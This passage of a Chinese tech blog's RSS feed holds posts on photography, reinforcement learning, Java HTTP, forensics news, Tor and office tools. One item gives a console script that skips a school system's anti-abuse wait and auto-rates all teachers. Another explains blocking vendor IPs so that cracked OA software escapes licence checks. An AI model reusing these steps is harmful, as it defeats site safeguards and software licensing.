方画幅是标准的正方形，给人以均衡，严肃，稳定，静止的视觉效果，在表现庄重，稳定的主题时往往使用这种构图方式。&#xA;3.2黄金分割构图&#xA;通过使用井字形构图方法，我们在拍摄时能够便捷的将所要突出的被摄主体安排在画面中最引人注目的位置，并且还可使整个画面看起来更加符合人们的审美习惯。&#xA;井字形构图特别适合拍摄两种照片:a.当拍摄主体在画面中所占面积较小时，可以将其放置在井字形交叉点上，从而使其在画面中突出出来； b.另一种就是当被摄主体占满整幅照片，并且想要突出主体的某一局部时，也可以将这一局部安排在井字形交叉点上，从而使得画面有效的突出。&#xA;3.3 极简构图&#xA;极简构图要求画面中的元素非常少，大部分画面都是留白，主体占很小的一部分。极简构图给人一种简单干净的感觉，同时画面又不乏艺术表现力。&#xA;我们在进行极简构图时，要注意以下几点:</description>
    </item>
    <item>
      <title>【强化学习】DDPG(Deep Deterministic Policy Gradient)算法详解</title>
      <link>https://anwangtanmi.github.io/posts/f17289c3b6dd646f2bbf34dcf7aee7f2/</link>
      <pubDate>Fri, 22 Jun 2018 19:00:57 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/f17289c3b6dd646f2bbf34dcf7aee7f2/</guid>
      <description>http://www0.cs.ucl.ac.uk/staff/d.silver/web/Teaching.html 引自Reinforcement Learning:An Introduction强化学习名著2018新编版 DPG论文http://www0.cs.ucl.ac.uk/staff/d.silver/web/Applications_files/deterministic-policy-gradients.pdf PolicyGradient论文https://www.ics.uci.edu/~dechter/courses/ics-295/winter-2018/papers/2000-nips12-sutton-mcallester-policy-gradient-methods-for-reinforcement-learning-with-function-approximation.pdf DDPG论文http://www0.cs.ucl.ac.uk/staff/d.silver/web/Applications_files/ddpg.pdf DQN论文http://web.cse.ohio-state.edu/~wang.7642/homepage/files/Peidong_Wang_DQN.pdf&#xA;【强化学习】DDPG(Deep Deterministic Policy Gradient)算法详解 之前我们在Actor-Critic上面提到过了DDPG，现在本篇详细讲解，因为Actor-Critic收敛慢的问题所以Deepmind 提出了 Actor Critic 升级版 Deep Deterministic Policy Gradient，后者融合了 DQN 的优势, 解决了收敛难的问题。&#xA;1、算法思想 DDPG我们可以拆开来看Deep Deterministic Policy Gradient Deep：首先Deep我们都知道，就是更深层次的网络结构，我们之前在DQN中使用两个网络与经验池的结构，在DDPG中就应用了这种思想。 PolicyGradient：顾名思义就是策略梯度算法，能够在连续的动作空间根据所学习到的策略（动作分布）随机筛选动作 Deterministic : 它的作用就是用来帮助Policy Gradient不让他随机选择，只输出一个动作值&#xA;随机性策略，&#xA;∑π(a|s)=1&#xA;∑&#xA;π&#xA;(&#xA;a&#xA;|&#xA;s&#xA;)&#xA;=&#xA;1&#xA;策略输出的是动作的概率，使用正态分布对动作进行采样选择，即每个动作都有概率被选到；优点，将探索和改进集成到一个策略中；缺点，需要大量训练数据。 确定性策略，&#xA;π(s)S→A&#xA;π&#xA;(&#xA;s&#xA;)&#xA;S&#xA;→&#xA;A&#xA;策略输出即是动作；优点，需要采样的数据少，算法效率高；缺点，无法探索环境。然而因为我们引用了DQN的结构利用offPolicy采样，这样就解决了无法探索环境的问题 从DDPG网络整体上来说：他应用了 Actor-Critic 形式的, 所以也具备策略 Policy 的神经网络 和基于 价值 Value 的神经网络，因为引入了DQN的思想，每种神经网络我们都需要再细分为两个, Policy Gradient 这边，我们有估计网络和现实网络，估计网络用来输出实时的动作, 供 actor 在现实中实行，而现实网络则是用来更新价值网络系统的。再看另一侧价值网络, 我们也有现实网络和估计网络, 他们都在输出这个状态的价值, 而输入端却有不同, 状态现实网络这边会拿着从动作现实网络来的动作加上状态的观测值加以分析，而状态估计网络则是拿着当时 Actor 施加的动作当做输入。 DDPG 在连续动作空间的任务中效果优于DQN而且收敛速度更快，但是不适用于随机环境问题。 2、公式推导 再来啰唆一下前置公式 st</description>
    </item>
    <item>
      <title>暗网DarkNet的进入步骤，留存备用</title>
      <link>https://anwangtanmi.github.io/posts/59c403d0f935113aba9ef4807a77fef0/</link>
      <pubDate>Sat, 16 Jun 2018 09:20:49 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/59c403d0f935113aba9ef4807a77fef0/</guid>
      <description>https://blog.csdn.net/Rory898863935/article/details/76584084</description>
    </item>
    <item>
      <title>HTTP请求</title>
      <link>https://anwangtanmi.github.io/posts/669262cdc6d352bc65b1f5d784db52f9/</link>
      <pubDate>Fri, 08 Jun 2018 18:14:16 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/669262cdc6d352bc65b1f5d784db52f9/</guid>
      <description>HTTP请求 一.GET和POST方法有什么区别 get方式属于明文传参（不加密），在地址栏参数可见 post方式属于暗文传参，在地址栏参数不可见&#xA;二.HttpURLConnection请求网络数据实例 创建URL地址对象&#xA;URL url = new URL(&#34;https://www.baidu.com/&#34;); 创建Connection对象&#xA;HttpURLConnection connection = (HttpURLConnection) url.openConnection(); 创建输入流对象&#xA;InputStream inputStream = connection.getInputStream(); 创建Reader对象&#xA;InputStreamReader reader = new InputStreamReader(inputStream); 创建BufferedReader对象&#xA;Bufferedder bufferedReader = new BufferedReader(reader); 开始读取&#xA;String temp = &#34;&#34;; StringBuffer stringBuffer = new StringBuffer(); while ((temp = bufferedReader.readLine()) != null) { stringBuffer.append(temp); } Log.e(&#34;WEB&#34;, stringBuffer.toString()); } catch (MalformedURLException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } 布局文件：</description>
    </item>
    <item>
      <title>一周电子取证行业热点简讯</title>
      <link>https://anwangtanmi.github.io/posts/8dffc90911f28f41ff1267c08b76d3cf/</link>
      <pubDate>Fri, 18 May 2018 14:35:39 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/8dffc90911f28f41ff1267c08b76d3cf/</guid>
      <description>●第九届警博会今天闭幕，效率源科技展位人潮满蓬&#xA;第九届中国国际警用装备博览会今天（5月18日）就要闭幕了。为期四天的博览会迎来了来自全球各地的参展商和客户。效率源产品获赞，为构建智慧警务出力，效率源在展位5B-E5等待迎接来自全国乃至全球的客户。本次效率源参展主题是：为构建智慧警务提供专业的电子取证设备及解决方案。在展会上重点展示国内首款暗网取证产品，电子取证实验室最受欢迎设备，数据恢复、手机取证、视频侦查三大明星产品及解决方案。&#xA;●效率源受邀参加第十四届文博会&#xA;第十四届中国（深圳）国际文化产业博览交易会（以下简称文博会）于2018年5月14在深圳落下帷幕，效率源受邀参加了这一盛会。&#xA;文博会期间，效率源DPS数字多媒体保护系统（以下简称DPS）受到来会客户的极大关注。DPS可对存储于硬盘、U盘等多种存储介质中的文档档案文件、三维数字格式文件等进行恢复，甚至能在电脑硬盘损坏时进行存储介质物理层面的修复，从根本上解决由于误删除、误格式化乃至硬盘损坏造成的数字文物丢失，是数字化文物保护的最后一道防线。&#xA;●“成都人工智能发展论坛”在成都举办&#xA;为加快推动人工智能技术突破、产业发展，加速促进人工智能与经济社会深度融合，加快建设人工智能创新高地，推动新一代人工智能发展，由成都市科学技术局、成都市科学技术协会主办的“成都人工智能发展论坛”在成都举办。&#xA;效率源受邀参加此次论坛。论坛集中展示国内外人工智能相关领域的新产品、新技术、新应用。同时，就人工智能与各行各业的结合进行了主题报告的演讲。收益颇丰。也为效率源在探索人工智能新技术新领域奠定了基础。&#xA;●美国DHS发布《网络安全战略》 确定五大方向及七个目标&#xA;美国国土安全部（DHS）当地时间2018年5月15日发布网络安全战略，希望更积极地履行网络安全使命，以保护关键基础设施免于遭受网络攻击。该战略旨在使 DHS 的网络安全工作规划、设计、预算制定和运营活动按照优先级协调开展。该战略将致力于协调各部门的网络安全活动，以确保相关工作的协调一致。作为负责网络安全工作的主要文职机构，DHS 一直努力促进其它机构对网络威胁的重视程度，进而可以分配足够的资源来应对网络威胁。&#xA;该战略描绘了 DHS 未来五年在网络空间的路线图，为 DHS 提供了一个框架，指导该机构未来五年履行网络安全职责的方向，以减少漏洞、增强弹性、打击恶意攻击者、响应网络事件、使网络生态系统更安全和更具弹性，跟上不断变化的网络风险形势。&#xA;根据战略要求，DHS 须制定出新流程以保障 DHS 机构内部权责明确，进而推动必要的网络安全变革。此外，DHS 还须推出一套正规方法以衡量及掌握机构在信息安全政策、实践和必要控制措施方面的采用情况。&#xA;●检察机关出动无人机，在案发现场上空“无死角取证”&#xA;今日，南通市通吕运河边的一处拆迁地块上空。“呜……”伴着低沉有力的轰鸣，一架外表酷炫的黑色无人机爬升、搜索、定位、拍摄，整套动作一气呵成。地面，一名身着检察制服的年轻小伙子在娴熟操控，另外两名检察官密切注视着小伙子手中的显示屏。这不是无人机爱好者在进行航拍，而是南通崇川检察院民事行政检察部门（简称民行部门）的检察官在利用无人机进行行政公益诉讼结案验收，核查诉前检察建议的落实和整改情况。&#xA;●四川眉山公安借力“大数据”创新禁毒治理工作&#xA;“运用信息化、大数据改造公安工作”，是四川省眉山市公安机关提出的创新工作理念。&#xA;眉山市副市长、市公安局局长罗毅说，用“大数据改造”后的公安工作在禁毒领域率先开花结果。2017年以来，眉山市以实施“6·27”“8·31”两大工程为载体，把青少年毒品预防教育、社区戒毒社区康复以及病残吸毒人员收治作为社会治理系统工程来实施，纳入市政府“智慧城市、平安眉山”总体规划。眉山公安主动拥抱现代科技，将“互联网+”、大数据等信息技术广泛运用于禁毒治理中，深入推进禁毒理念思路、体制机制、方法手段创新，努力提升眉山禁毒治理体系现代化水平，全面开创新时代眉山禁毒工作新局面。&#xA;●民政系统与公安部门联手运用人脸识别技术开展寻亲服务&#xA;日前，青海省省民政厅与公安厅商定，依托公安部门新开发的全国和全省人像比对系统，对寻亲不着的流浪乞讨人员免费新增人像比对查询服务，发挥人脸识别系统等高科技手段在救助寻亲服务中的作用，提高寻亲成功率。此次商定添加的全国和全省人像比对系统，将使越来越多的流浪乞讨人员成功寻亲返家。目前，各级救助管理部门和公安治安警察部门已开始对滞留我省各级救助管理站内寻亲不着的流浪乞讨人员开展人脸识别信息采集。</description>
    </item>
    <item>
      <title>PPT2016制作一个封面页实例教程</title>
      <link>https://anwangtanmi.github.io/posts/8f1072369abae1475b81830ff2328e32/</link>
      <pubDate>Sat, 28 Apr 2018 09:38:38 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/8f1072369abae1475b81830ff2328e32/</guid>
      <description>﻿﻿ 今天陈飞老师分享一个使用PPT2016制作一个封面页实例，其中涉及到知识点包括了图片变暗处理，线框的设置，PPT文字居中到页面正中，我们先看一下效果图&#xA;第一步：插入图片，进行大小调整，当然这里面最关键就是注意在PPT插入的图片应该保证比例统一，不能变形。但是默认插入的图片在PPT会盖住默认输入文字的占位符。需要给调整顺序。如下图1所示位置&#xA;我们插入的图片有太亮了。可以通过更正调整图片的亮度与对比度：这样做的好处就是为了让我们标题文字进行凸显，这也是PPT处理标题文字常用的一中手法 http://www.dushuwu.net/xqkan.aspx?newsid=443&#xA;第二步：在默认提供的PPT标题占位符输入标题文字读书屋OFFICE教程网，并进行文字大小，颜色，字体的改变，最后调整一下占位符大小和位置(可以参考PPT视频讲解)，并且为标题添加一个文本映像效果&#xA;也可以让标题文字放在整个页面正中，这里面的关键点在于先选择对齐幻灯片，然后在设置对齐上下居中。这样就可以保证了标题框在正中了&#xA;第三步：在标题框外侧添加线框进行装饰，线框在PPT封面页这个设计中，也是为了引导听众在标题文字上停留，操作的关键点在于，绘制线条，改变线条的颜色，操作的技巧点在于可以先一次把线条绘制完成，然后在按SHIFT键进行加选线条。在PPT绘制线条时，可以按住SHIFT键变成一个直的&#xA;PPT软件中所有的关于线条（边线）的设置都在形状轮廓属性中，可以进行粗细，颜色类型的改变&#xA;通过上边3步我们就可以制作出一个比较好看的PPT的封面页。这里面主要就是对图片进行变暗处理，通过线框引导听众注意力，给标题文字增加效果</description>
    </item>
    <item>
      <title>TOR阶段总结</title>
      <link>https://anwangtanmi.github.io/posts/70dc790578b2898ba8b74a96cd384d6d/</link>
      <pubDate>Mon, 26 Mar 2018 20:55:19 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/70dc790578b2898ba8b74a96cd384d6d/</guid>
      <description>这几天在博客园上跟一个也是最近才开始研究TOR的大佬聊了聊交换了信息，才发现自己确实还有很多技术功底需要积累。从前面我写的内容看，很多东西都没有挖掘太过底层，个人来说还是理论学习多于实践的多，大佬长我14岁，14年间的工程经验可以使他阅读开源项目的时候更敏锐更灵敏地嗅探到作者做法背后对性能，对逻辑，对跨平台编译，对系统架构方面的影响。可以很直接地做出一定的推论，可以比较有依据地判断“行”还是“不行”。作为一个刚开始进入计算机世界的人来说，一度总是认为什么都有得做，而忽略了这背后带来的“成本”和“难度”。诚然，什么都是可以实现的，比如说改一下LINUX内核啊，比如说黑进某某大厂的主机啊等等。但可以是可以，并不现实。大佬的出现给了我很多建议和思路，让我一开始很多想法得到了支持，也有一些想法被证实不可行。我也希望跟在别人后面去学习，去实践，而不用自己去踩过每一条路上的坑。&#xA;TOR的源码确实很简洁很优美，曾经认为源码阅读是一件很费神的事，毕竟怎么可以做到对那么大的系统一个总体的感知呢。但其实只要有一定的计算机理论基础，随着不停地看见新的模块不停地发现新的内容，新问题会不断地出现，也会不断地被解决，在解决的过程中脑海会逐渐织出这个源码的模型，哪个部分会做什么，哪个部分具体会怎么做，加上Doxygen生成的文档可以很直接地找到函数的调用链及函数的解释，所以我越读越轻松，越读越惊讶于开发者的成熟老练。&#xA;至于真正要做的，我认为还是要大胆尝试一下，TOR里面有个连接填充的功能，里面的填充数据元好比HELLO确认报文一样，大多数情况下是用作确认和保持连接活性，我决定用一定量的padding数据元来完成通道流量的填充。似乎我也逐渐找到了进行填充时的完整逻辑，填充发生于链路空闲，或者说链路仍需要被维持，我们还需要找到一个padding cell具体有多大，来确认最终的流量填充方案。&#xA;可能限于我的了解，padding cell并不可以这样用，但似乎看来只有这种类型的数据元才是对链路影响最小的，姑且一试。&#xA;然后怎么测试论证似乎成为了问题，TOR原本有做流量混淆的功能，他们在本地区所使用的obsf4网桥就是为了规避流量审查的功能，将TOR流量套上一层HTTP或者什么其他的壳进行伪装以不被拦截下来。但看了看似乎源码里并没有这个功能相关的代码，而且似乎被实现在了obsf4里面，而这个项目又是GO写的，这就触及我知识盲区了。&#xA;毕竟我只有自己一个人，而不是一群人。没有人和我交流没有人帮我一起发现问题一起阅读，没有强制力约束我也懒得约束他们，要是我给他们开工资那还好说。但他们就是觉得不会有成果，所以放弃了。而我做至如今，就是为了要出成果让他们觉得愧对。倘若最终结果也不好，那我真的，，成吧，时间费去了，却一无所有。&#xA;但我还年轻，我想有始有终。</description>
    </item>
    <item>
      <title>欢you度yuan元旦赛（18.1.1）</title>
      <link>https://anwangtanmi.github.io/posts/a29191aecd74d40d0ca8cc766e1314e9/</link>
      <pubDate>Mon, 01 Jan 2018 12:49:35 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/a29191aecd74d40d0ca8cc766e1314e9/</guid>
      <description>T1 最优图像 【题目描述】 小E在好友小W的家中发现一幅神奇的图画，对此颇有兴趣。它可以被看做一个包含N×M个像素的黑白图像，为了方便起见，我们用0表示白色像素，1表示黑色像素。小E认为这幅图画暗藏玄机，因此他记录下了这幅图像中每行、每列的黑色像素数量，以回去慢慢研究其中的奥妙。 有一天，小W不慎将图画打湿，原本的图像已经很难分辨。他十分着急，于是找来小E，希望共同还原这幅图画。根据打湿后的图画，他们无法确定真正的图像，然而可以推测出每个像素原本是黑色像素的概率Pij%。那么，一个完整的图像的出现概率就可以定义为 ，其中Sij表示在还原后的图像中，像素是白色(0)还是黑色(1)。换句话说，一个完整图像出现概率就等于其所有黑色像素的出现概率之积。显然，图像的黑色像素不能包含概率为0的像素。 然而，小E对此也无能为力。因此他们找到了会编程的小F，也就是你，请你根据以上信息，告诉他们最有可能是原始图像的答案是什么。&#xA;【输入文件】 输入文件image.in的第一行是两个正整数N和M，表示图像大小。 接下来N行每行包含M个整数，表示每个像素是黑色像素的概率为Pij%。0 ≤ Pij &amp;lt; 100。 接下来一行有N个非负整数，表示每一行中黑色像素的个数。 接下来一行有M个非负整数，表示每一列中黑色像素的个数。&#xA;【输出文件】 输出文件image.out包含一个N×M的01矩阵，表示你还原出的图像。输出不包含空格。图像每行、每列中1的个数必须与输入一致，且是所有可能的图像中出现概率最大的一个。输入数据保证至少存在一个可能的图像。如果有多种最优图像，任意输出一种即可。&#xA;【样例输入】 2 2 90 10 20 80 1 1 1 1&#xA;【样例输出】 10 01&#xA;【样例解释】 共有两种可能的图像： 01 10 和 10 01 前者的出现概率是0.1×0.2=0.02，后者的出现概率是0.9×0.8=0.72，故后者是最优图像。&#xA;【数据规模和约定】 对于20%的数据，N , M ≤ 5 对于100%的数据，N , M ≤ 100&#xA;分析： 首先看到这道题，感觉又像贪心，又像dp&#xA;我们就应该有一种直觉：网络流 建图方式显而易见 但是每一种图的贡献是一种连乘的形式 而网络流好像只能计算相乘的形式，怎么办呢&#xA;中午吃饭的时候，dp表示：可以取一个lg，这样就可以把乘变加了 觉得非常有道理&#xA;建图：用1…n表示行，n+1…n+m表示列，&#xA;若Pij&amp;gt;0，则连一条边(i,n+j)，费用为-lg(Pij)*100000，容量为1 然后从s向1…n连边，费用为0，容量为这一行的黑色像素数量 然后从n+1..n+m向t连边，费用为0，容量为这一列的黑色像素数量 求这个图的最小费用最大流&#xA;写完测了一下，只能过掉20%的数据 听说需要用ZKW网络流优化 （本文中不再冗述，重点在于解题思路）&#xA;tip 注意输出的时候没有空格（mdzz，太不认真了。。。）</description>
    </item>
    <item>
      <title>我来教你制作JS脚本，一键完成学校教务系统的评教！</title>
      <link>https://anwangtanmi.github.io/posts/13a9016d5372989e8fe8a3cef9281f35/</link>
      <pubDate>Thu, 14 Dec 2017 15:21:51 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/13a9016d5372989e8fe8a3cef9281f35/</guid>
      <description>需求：我们在学校每学期都要完成教师教学评教，但是课程多，评教有点麻烦，我们能不能一键评教所有课程老师的评教呢？&#xA;答案肯定是有的。首先登陆你学校的教务系统，我学校的教务系统是正方教务系统。推荐使用Chrome浏览器，登陆到评教页面，再按F12，显示如下图所示的页面。&#xA;点中上图的Console 控制台，把下面的代码复制黏贴过去按回车。注意教师评教页面是要等待30秒，才能点击保存的，这是我学校系统为了防止非法的频繁操作。所以要等待完30秒后，再按回车，好了你会发现页面会自动完成选择，并跳转到最后一页，此时你只需要按下提交，就完成了评教！&#xA;var iframe = window.top.document.getElementById(&#39;iframeautoheight&#39;); var ifdocument = iframe.contentWindow.document;&#x9;var subLength = ifdocument.getElementById(&#34;pjkc&#34;).length - 1; ifdocument.getElementById(&#34;TextBox1&#34;).value = - 1; //去掉等待时间 function execution(){ var iframe = window.top.document.getElementById(&#39;iframeautoheight&#39;); var ifdocument = iframe.contentWindow.document;&#x9;//网站提交后会自动跳转下一课程 var reg = /^DataGrid1__ctl\d+_JS1$/; var selections = ifdocument.getElementsByTagName(&#34;select&#34;); for(var i = 0 ; i&amp;lt; selections.length; i++){ if(reg.test(selections[i].getAttribute(&#34;id&#34;))){ selections[i].value = &#34;优秀&#34;; } } ifdocument.getElementById(&#34;Button1&#34;).click(); } execution(); iframe.onload = function(){ if(subLength -- &amp;gt; 0){ execution(); } } 那我们来看看具体是怎么实现的。</description>
    </item>
    <item>
      <title>记录一次被攻击勒索（redis“未授权访问”漏洞）</title>
      <link>https://anwangtanmi.github.io/posts/096a91d6e17783f1e5e2fcb922f01103/</link>
      <pubDate>Sat, 09 Dec 2017 19:41:16 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/096a91d6e17783f1e5e2fcb922f01103/</guid>
      <description>背景 话说，我开了一台腾讯云服务器跑redis-server，并将其配置为无须密码对外开放，方便我本地调试代码。 今天下午却意外发现云主机被关机了，上午我还用来调试代码呢，重新开机并登陆查看系统日志发现有个俄罗斯的IP地址登陆了系统并关闭了我的redis-server且关机。系统日志如下：&#xA;#/var/log/auth.log: Dec 9 14:41:32 localhost sshd[25235]: Accepted publickey for root from 185.153.198.57 port 36148 ssh2: RSA SHA256:SdMM2Kh/nCGqWmXuFENkv7FV1ED4sXqlohMIfGmXLl8 #/var/log/syslog: Dec 9 14:41:32 localhost systemd[1]: Started Session 58722 of user root. Dec 9 14:41:35 localhost systemd[1]: session-33891.scope: Killing process 12706 (redis-server) with signal SIGTERM. Dec 9 14:41:35 localhost systemd[1]: Stopping Session 33891 of user root. Dec 9 14:41:35 localhost systemd[1]: Stopping User Manager for UID 0... Dec 9 14:41:35 localhost systemd[1]: Stopped target Graphical Interface.</description>
    </item>
    <item>
      <title>电脑显示屏突然一半变色并且抖动</title>
      <link>https://anwangtanmi.github.io/posts/6b0759fdd36d38a8177eb9b50890b019/</link>
      <pubDate>Fri, 08 Sep 2017 17:16:05 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/6b0759fdd36d38a8177eb9b50890b019/</guid>
      <description>刚打开电脑的时候还是正常的，当打开浏览器连接网络的时候，屏幕突然有一半变了颜色，并且在一直抖动，起初还以为是浏览器的问题，结果关闭浏览器之后，也还是会有这样的问题，重启了几遍之后也依然是没有作用。&#xA;后来了解到，发生这种问题的原因可能是：1）显卡坏了 2）屏线坏了&#xA;如果不是专业人士，还是送去专业维修地点维修比较妥当。</description>
    </item>
    <item>
      <title>通达OA应对后门检测的临时方法</title>
      <link>https://anwangtanmi.github.io/posts/541199c5c725ff46628c4dff0c677b2d/</link>
      <pubDate>Thu, 31 Aug 2017 11:02:42 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/541199c5c725ff46628c4dff0c677b2d/</guid>
      <description>前言 关于防范官方后门检测的一般做法及释疑 麦枫网如何做到对官方后门的全面清理的。随着版本的不断更新，通达OA系统目前文件包 里有几万个文件，每个文件都有可能设置后门、木马代码，只有通过对每个文件都进行检 查才知道该文件是否有后门。仅仅从工作量上来说，就相当费时费力，清理后门代码，除 了反编译或逆向分析 EXE、DLL 文件外，还必须全部解密官方的所有网页文件代码，才可以做到逐个文件清查后门的工作，而且，文件解密后的查马工作、代码纠错的工作量也相 当庞大，技术力量薄弱的团队很难做到 100%解密而又无代码错误的，能够做到 100%全解 密的等同拥有通达OA系统的源代码，说起来是一句话，但做到不容易，这就可以理解为什么源代码会卖那么贵了吧，这是另外一个话题了。注册机破解版，不需要动通达OA的文 件，没解密文件，没检查代码，没编辑处理代码，所以不可能去掉后门和暗桩，所以稳定 性需要大打折扣了。如果你使用了官方的试用版或者不幸使用了一些注册机破解版，麦枫网这里提供如下临时的解决办法，即通过网关、路由等设备屏蔽官网 IP 及网址，断绝 OA 和官方的连接途经，让官方检测不到你在使用。这里不妨爆个料：有一个使用版和破解版 用户数据库，精确到使用人，是不是有点怕怕？！只是官方为推广的需要，默许大家使用，用得好或者企业做大了，自然就会需要买正版，这是一种风度和长远策略。但是，你 做点什么总有无数的眼睛盯着，还是不太安定吧。那么采用一些临时解决办法也是管用 的。通达OA最新版本已经到2017年8月版了，现以通达OA2015版为例来说明。新版同理。 正文 第一步操作：配置本地 IP 安全策略，阻止 OA 与官网的通讯连接， 防止向官网回传信息。 windows 开始菜单点运行 输入 secpol.msc 打开本地安全策略 可以在这导入，也可以新建 不选中“激活默认”这个选项 不选中添加向导，然后点击添加 弹出新规则属性再点击添加,名称随意 取消添加向导 点击添加 添加需要阻止的 IP 点击确定 再重复上一步，把所有以下 IP 添加完毕。 211.144.136.73 222.246.129.82 211.144.151.105 211.144.136.73 123.114.144.221 203.171.230.177 121.40.135.46 112.253.12.33 然后确定，选中筛选器并点下一步。 添加筛选操作，去掉向导选项 选择阻止，确定 确定后，选中这个筛选操作 ，点下一步后确定。 看到刚设置的 IP 策略 右键点击它，按【分配】激活此 IP 策略。 最后为策略改一个容易辨认的名称 到此完成 IP 策略的设置。 第二步操作：配置 HOST 用文本编辑器打开 C:\Windows\System32\drivers\etc\hosts 文件 找到一下这一行 127.</description>
    </item>
    <item>
      <title>【PhotoShop】用自己的照片做个好看的星空头像PS</title>
      <link>https://anwangtanmi.github.io/posts/b52be374df67e1a840c2377665a5be80/</link>
      <pubDate>Wed, 16 Aug 2017 16:01:04 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/b52be374df67e1a840c2377665a5be80/</guid>
      <description>图片素材均来自于网络。&#xA;1.打开图像，把图片直接拖入ps 2.选择 多边形套索 工具 3.圈出想要的部分 4.图像 》》调整 》》阈 (yu四声) 值 5.调整小三角，直到看清五官(我这个素材选择有点不太好，有点形成阴阳脸，就是说 明暗差距有点大，调出来也是一面黑一面白。只能看清楚一边。)&#xA;6.调整好之后，点击确定。然后按Ctrl+J 把这部分烤出来。 7.点击 选择》》色彩范围》》吸取头发黑色的部分颜色（这时候对话框里的脸会变黑。） 8.点击确定。Ctrl+N 新建一个页面。参数自定就行。我这里的参数有点大。分辨率尽量是72 9.这一步可以跳过，这一步的目的只是为了让之后的结果看得更加清楚。右击新建的图层前面的缩略图，选择图层样式，把图层样式改为如下参数。 10.点击回到刚才的选项卡，按“V”字母键，切换到移动工具，把我们的“脸”拖到第二个选项卡（新建的页面） 拖过来 是这样的 11.把之前准备好的星空素材拖进来。。星空素材的图层应该在 “脸”图层之上。 12.（这一步很关键）按住Alt，把鼠标移动到 星空和“脸”中间，会出现如图空白处绘制的形状，然后单击鼠标左键。 13.把可能多余的部分用左侧橡皮擦工具擦掉，如果嫌麻烦，那你前期就应该仔细吧脸部裁出来。&#xA;14.如果想在下面打上字。同样的操作方法。打完字以后，再拖进来一张“星空”，星空图层在字的上面，按住Alt并且单击鼠标左键（位置在星空图层和字图层的中间），就ok啦！ 效果如图： 15.最终出来的图片如图。 挚谢阅读。</description>
    </item>
    <item>
      <title>（转）卫星已经out了，为了获取信息优势对冲基金盯上了“暗网”</title>
      <link>https://anwangtanmi.github.io/posts/0a5a401fa484fea3ebfb149ba85dd41f/</link>
      <pubDate>Sun, 13 Aug 2017 13:51:54 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/0a5a401fa484fea3ebfb149ba85dd41f/</guid>
      <description>https://wallstreetcn.com/articles/3024733&#xA;卫星已经out了，为了获取信息优势对冲基金盯上了“暗网”&#xA;2017-08-12 15:39 7 24207&#xA;摘要：为了获得信息优势，对冲基金除了紧盯着Twitter、看遍Amazon上的评论、分析卫星图像之外，如今甚至开始利用暗网。&#xA;本文来自华尔街见闻（微信ID：wallstreetcn），作者唐晗。更多精彩资讯请登陆wallstreetcn.com，或下载华尔街见闻APP。&#xA;信息乃决策之源。在这场关于信息的军备竞赛中，对冲基金们不仅刮遍了Twitter，登上了Amazon账号去翻看各种评论，甚至还调阅了卫星对地面油厂进行监控。现在，他们正转向了一个更加受人争议的信源：暗网。&#xA;据 FinancialNews报道，有些金融情报专家正在将来自暗网的消息转卖给对冲基金。这些情报专家擅长挖掘商业内幕，并熟识商界相关人士。&#xA;一位情报专家对FinancialNews称，暗网上有着各种各样的毒品、武器甚至是涉恐交易。它们以加密数字货币为支付手段，以便隐藏交易人的身份。而这些令人不齿的交易，其信息对对冲基金来说又十分有用。&#xA;“有些对冲基金主动来找我们，因为他们需要知道自己所投资的领域内究竟发生了什么。例如，他们可能想知道一个总部位于中东的武器制造商的相关情况。那么我们就用暗网帮他们查找，该制造商的产品是否在暗网上出售，他们的产品是否有市场、是否有假冒品，还有人们对这些制造商们的评级。”&#xA;这位情报专家还表示，在暗网上追踪公司不仅仅适用于军火商，是可以用于对制药企业的调查。一旦他的团队在暗网上发现大量且不断增加的假药在暗网上销售，他们就会警告对冲基金，“买进这个品牌是没有意义的，因为它们的价值遭到了侵蚀。”&#xA;比起倒卖假药，想要在暗网上查到洗钱和恐怖活动交易则更加困难。但是，当对冲基金怀疑目标公司的活动或收入来源不正当时，他们通常都会要求这些情报专家上暗网查找目标公司的负面信息。&#xA;法律与道德的擦边球&#xA;尽管接触暗网在美国和英国并不违法，但将其作为投资决策的信源，仍与使用社交媒体和卫星云图等公开资料有所不同。&#xA;一位情报调查人员表示，对于对冲基金来说，使用来自暗网的信源比使用公开信源更难向投资者解释。此外，暗网的匿名性也让对冲基金难以确定他们是否真的获取了内幕消息。&#xA;这位调查人员目前已经暂停了与对冲基金公司的合作，因为在当前严厉的监管下，在暗网中进行调查是在太难了。&#xA;他还表示：“为了获取有效信息，对冲基金花钱无数。对冲基金做出的决策都是基于手头上的信息。可以说，他们的工作就是赌自己手上的信息比市场上的其他人要好。为了获取信息，一些人正在打道德和法律的擦边球。”&#xA;Kroll（一家价值10亿美元的企业调查公司）的前分析师表示，从暗网获取信源为企业服务，这对调查公司提出了道德挑战。更糟糕的是，在访问暗网前必须对设备做好足够的保护措施，否则找上门的不会是信源，而将是病毒。</description>
    </item>
    <item>
      <title>Android_PopupWindow</title>
      <link>https://anwangtanmi.github.io/posts/e0709c87f3eece9a028501a10c0d85bc/</link>
      <pubDate>Fri, 21 Jul 2017 16:18:13 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/e0709c87f3eece9a028501a10c0d85bc/</guid>
      <description> PopupWindow 不同于其他对话框—&amp;gt;Dialog对话框弹出后，主界面变暗并且无法操作，无法获取焦点 PopupWindow对话框弹出后主界面仍然可以获取焦点&#xA;创建和Dialog类似 ①、xml中自定义创建pop窗体的布局 ②、创建自定义PopupWindow类 ③、调用 </description>
    </item>
    <item>
      <title>源码安装 mysql的种种问题(已解决)</title>
      <link>https://anwangtanmi.github.io/posts/ae2d3753f720823f3b1a63bfeeabf762/</link>
      <pubDate>Fri, 30 Jun 2017 22:52:56 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/ae2d3753f720823f3b1a63bfeeabf762/</guid>
